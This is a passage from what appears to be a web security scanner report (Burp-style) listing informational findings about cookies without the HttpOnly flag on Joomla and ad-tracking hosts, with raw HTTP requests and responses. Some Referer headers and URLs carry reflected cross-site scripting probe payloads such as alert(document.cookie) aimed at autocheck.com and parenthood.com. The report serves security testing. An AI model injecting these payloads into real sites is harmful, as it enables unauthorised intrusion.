Content-Type: image/gif
Content-Length: 43
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

GIF89a.............!...
...,...........L..;

14.534. http://people.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
  • currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.535. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 33e27d3d0725f34a77c307be63476b5b=4f8b70569285b3c4a1fb98ed7e94a635; path=/
  • currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html; expires=Tue, 25-Jan-2011 22:47:59 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=4f8b70569285b3c4a1fb98ed7e94a635; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html; expires=Tue, 25-Jan-2011 22:47:59 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.536. http://ping.crowdscience.com/ping.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • __csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Ftweetmeme.com%2F&id=5c5c650d27&u=mozilla%2F5.0%20(windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us)%20applewebkit%2F534.10%20(khtml%2C%20like%20gecko)%20chrome%2F8.0.552.237%20safari%2F534.10&x=1295907703307&c=0&t=0&v=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/
Content-Length: 867
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c361a3372a99df5c;path=/';
document.cookie = '__csv=286f8b371579253c;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('2d2e35941c7237e0'!='1')
...[SNIP]...

14.537. http://pix01.revsci.net/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
  • NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:19:11 GMT; Path=/
  • rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif?D=DM_LOC%3Dhttp%3A%2F%2Fwww.autocheck.com%2F%253FWT.mc_id%253D1824%2526siteID%253D182471a71%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%2Fscript%25253E6dab831a574%2526type%253D%2526make%253D%2526model%253D%2526sid%253DExperian%2526Year%253D%2526section%253D%2526content%253D%26DM_REF%3Dhttp%3A%2F%2Fburp%2Fshow%2F54%26DM_EOM%3D1 HTTP/1.1
Host: pix01.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFfEOlLgIYlVNWKZU1sWJH1I8V0sD586OtYWpJIZ5At588pHu0XtJj0vEjmwH5W+0fVgtXKwemg4X+X+ZcSFKrAeiVdwmYRcxYnZGANiwodqN5uhpI2RG7gf2tidEme72Dc6LcL4puWziUNiMSVj9Rlec2UMv/RY8CSw1fUUBq299ft5vcz4/QVANk+xUmIlgaIoFCnYcBk/VuIcXautuNt5oFCJuLKVA=; udm_0=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; rsi_us_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
Set-Cookie: NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:19:11 GMT; Path=/
Set-Cookie: rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
X-Proc-ms: 45
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:19:10 GMT

GIF89a.............!.......,...........D..;

14.538. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rsi_segs_1000000=pUPFe0PF7gMQVVNGyQq+TU2VE+8mA39mBOeRh8RvTJt273WYJS9QISCAgxkL8VjFACM37MfrDDLUs0/J7x6i1dFRPx6pUlOXaI5/n7KF+o95GFlfu6bAQxdbksk/G6ZetLtVuUHObHxtaAhT6IXAr41re6IGCI3YkT7Ot5GHMsd00VnbeSE3LED2fRDf76H+UXNnAo6GqQf642LViN27Nm5ci4P2QCs/mQ==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
  • udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
  • rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d80gUDW6ZteHnhbnxoW32lNFY0RqP3YO00gC9MvXLUz2hBYjVv/fgqyTx1ReFJEGLEnkzsXGVm9+/kBk41UxopUKSTrKRzkQ5YXg==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_us_1000000=pUMd5U+DfxIU7WxyqNQb+zH1s17HozKcX9zb1nGBmx1V/jUVnfeldtQjURXj62Ij5rwYZ9wJ1NqZFDtPnA/ai2kzB4ZWck4RlBED9tHPfALbjG5/h+EbQvknzyyRcrItMoJol6PXNTl/OKv1HLyRjqxPdUMPuhTeFrZcyO8gAu7DnkKRicwv26rJbnB2YkIMVwnyQe25v0bF8cRbuIDVa248qh0eMMOfyR/FXEsxPsbCZDweM7dbepZIWR3dtd+dVimkWAYQoZALNR+V/guGHuxfyVd2gEOLAGwOQllMhFXpg30hoPoVfJhXFUqiQNm3BzjM0qe3oej3+PsACj2CU61hVKeF2HNY9k2ol1ixdYUyhZXc+csbq2QEngScG8Fyk28f3CtFfcgafRot2T5UJdsjwU///O8q5QLpNWARM1w/lHLi6xhWyV7RPg2RTuUehxIA5X1CDzhakTy4gchBqLYpsImsUgwLdediq5xOCZUg5jzSYFUo7zRvJUElYuphp8OzQ1AQryrdIBXfr2Q7k0pOTQtw0Sya6irERSdIDFN9xHQEpu/KZi/VfFED67ADmmemfMMNlbnugnmTr6LTfKuLWuw4QB8ULOl4ICmXLj6pBD/5tNcSMJWTFHOixo4IK0vkutnkoKUs/dGDMVzfYfICMrfqYm5ooaMqvnmJ2DAzQJTYRF4vDA6NPTQcbJifGlogyZA5q8lXRY25R+s5rcSx1LACJzBJtIrHnrtl8SXouSQzf3kTOxNhVDItJBmmUFdwuBsLv9W3DOHJYpGPu7/HeVRht67vcq4vWMq3VbvT2WCZWCAVmSFQIlAkZlXJXT993g==; rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFe0PF7gMQVVNGyQq+TU2VE+8mA39mBOeRh8RvTJt273WYJS9QISCAgxkL8VjFACM37MfrDDLUs0/J7x6i1dFRPx6pUlOXaI5/n7KF+o95GFlfu6bAQxdbksk/G6ZetLtVuUHObHxtaAhT6IXAr41re6IGCI3YkT7Ot5GHMsd00VnbeSE3LED2fRDf76H+UXNnAo6GqQf642LViN27Nm5ci4P2QCs/mQ==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
Set-Cookie: rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d80gUDW6ZteHnhbnxoW32lNFY0RqP3YO00gC9MvXLUz2hBYjVv/fgqyTx1ReFJEGLEnkzsXGVm9+/kBk41UxopUKSTrKRzkQ5YXg==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 297
Date: Tue, 25 Jan 2011 03:06:32 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs = ['D08734_72132','D08734_72122','D08734_72123','D08734_72125','D08734_72126','D08734_71432'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['D087
...[SNIP]...

14.539. http://pix04.revsci.net/D08734/a3/0/3/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a3/0/3/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rsi_segs_1000000=pUPFeUOFbwIUllNab/cWT+71VQYFMB/S2WSRefHo4ZtopQOMM7v8PGteSudqC0pSV+0cVuXVIOwjJcWBtxQyhYXg266RvwGvtnnTlHdbuLEMszLgQEzYHnes8sv2VzE+J1DTe38IF3SOzHYQtLFR3ESF9iR7HCfJEVevflUUS/6dE/Mx/WJ1Xoojkg7wrwpMTBOQMei1AXvWMs0VC0dh24L4xtZiUwaGNkAfYEVXeFUytqh2B9e8pzfdb8ndYojjgotwwQs=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
  • udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a3/0/3/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Frl.com%253F&_rlcdnsegs= HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; rsi_us_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeUOFbwIUllNab/cWT+71VQYFMB/S2WSRefHo4ZtopQOMM7v8PGteSudqC0pSV+0cVuXVIOwjJcWBtxQyhYXg266RvwGvtnnTlHdbuLEMszLgQEzYHnes8sv2VzE+J1DTe38IF3SOzHYQtLFR3ESF9iR7HCfJEVevflUUS/6dE/Mx/WJ1Xoojkg7wrwpMTBOQMei1AXvWMs0VC0dh24L4xtZiUwaGNkAfYEVXeFUytqh2B9e8pzfdb8ndYojjgotwwQs=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:23:40 GMT

GIF89a.............!.......,...........D..;

14.540. http://pix04.revsci.net/G07610/b3/0/3/1003161/657607877.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G07610/b3/0/3/1003161/657607877.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
  • NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:23:12 GMT; Path=/
  • rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /G07610/b3/0/3/1003161/657607877.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.parenthood.com%252F%253Fd1907'-alert(document.cookie)-'807a8eb3eff%253D1%2526bpid%253DS024%2525204%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F57%26DM_EOM%3D1&C=G07610 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; 